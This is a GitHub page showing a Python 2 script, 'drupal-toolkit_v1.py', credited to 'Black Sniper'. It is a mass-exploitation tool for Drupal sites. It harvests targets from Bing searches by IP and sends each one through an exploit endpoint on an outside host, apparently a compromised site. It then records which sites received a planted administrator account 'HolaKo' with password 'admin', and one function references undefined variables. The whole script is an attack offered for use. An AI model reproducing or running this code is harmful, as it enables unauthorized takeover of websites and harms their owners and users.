-
Notifications
You must be signed in to change notification settings - Fork 6
/
drupal-toolkit_v1.py
146 lines (117 loc) · 4.92 KB
/
drupal-toolkit_v1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
#!/usr/bin/python
import urllib2,urllib,re,sys,json
from urlparse import urlparse
logo = '''
____ _ _____ _ _ _ _
| _ \ _ __ _ _ _ __ __ _| | |_ ____ ___ | | | _(_| |_
| | | | '__| | | | '_ \ / _` | |_____| |/ _ \ / _ \| | |/ | | __|
| |_| | | | |_| | |_) | (_| | |_____| | (_) | (_) | | <| | |_
|____/|_| \__,_| .__/ \__,_|_| |_|\___/ \___/|_|_|\_|_|\__|
|_| Version 1.0
'''
menu ='''
\t{1} Drupal Bing Exploiter
\t{2} Get Drupal Websites
\t{3} Drupal Mass Exploiter
\t{4} About Me
'''
def about():
print '''
# This Tool Created By Black Sniper #
| |
# Dont change The Right #
| |
# Hacker Make Tool Not Tool Make Hacker #
| |
# Contact Me If You Have An Idea Or For Make Tool For same Exploit #
| |
# Mail : Black4Sniper@hotmail.com #
| |
'''
#Definition Of Drupal Bing Expoliter
def drupal():
'''Drupal Exploit Binger All Websites Of server '''
ip = raw_input('1- IP : ')
page = 1
while page <= 50 :
url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
req = urllib2.Request(url)
opreq = urllib2.urlopen(req).read()
findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
page += 1
for url in findurl :
try :
urlpa = urlparse(url)
site = urlpa.netloc
print "[+] Testing At "+site
resp = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+site+'&submit=submit')
read=resp.read()
if "User : HolaKo" in read:
print "Exploit found =>"+site
print "user:HolaKo\npass:admin"
a = open('up.txt','a')
a.write(site+'\n')
a.write("user:"+user+"\npass:"+pwd+"\n")
else :
print "[-] Expl Not Found :( "
except Exception as ex :
print ex
sys.exit(0)
#Drupal Server ExtraCtor
def getdrupal():
ip = raw_input('2- Ip : ')
page = 1
sites = list()
while page <= 50 :
url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
req = urllib2.Request(url)
opreq = urllib2.urlopen(req).read()
findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
page += 1
for url in findurl :
split = urlparse(url)
site = split.netloc
if site not in sites :
print site
sites.append(site)
#Drupal Mass List Exploiter
def drupallist():
listop = raw_input("Enter The list Txt :")
fileopen = open(listop,'r')
content = fileopen.readlines()
for i in content :
url=i.strip()
try :
openurl = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+url+'&submit=submit')
readcontent = openurl.read()
if "Success" in readcontent :
print "[+]Success =>"+url
print "[-]username:HolaKo\n[-]password:admin"
save = open('drupal.txt','a')
save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")
else :
print i + "=> exploit not found "
except Exception as ex :
print ex
def main():
print logo
print menu
choose = raw_input("choose a number :")
while True :
if choose == "1":
drupal()
if choose == "2":
getdrupal()
if choose == "3":
drupallist()
if choose == "4":
about()
if choose == "11":
print "#By"
exit()
con = raw_input('Continue [Y/n] -> ')
if con[0].upper() == 'N' :
exit()
if con[0].upper() == 'Y' :
main()
if __name__ == '__main__':main()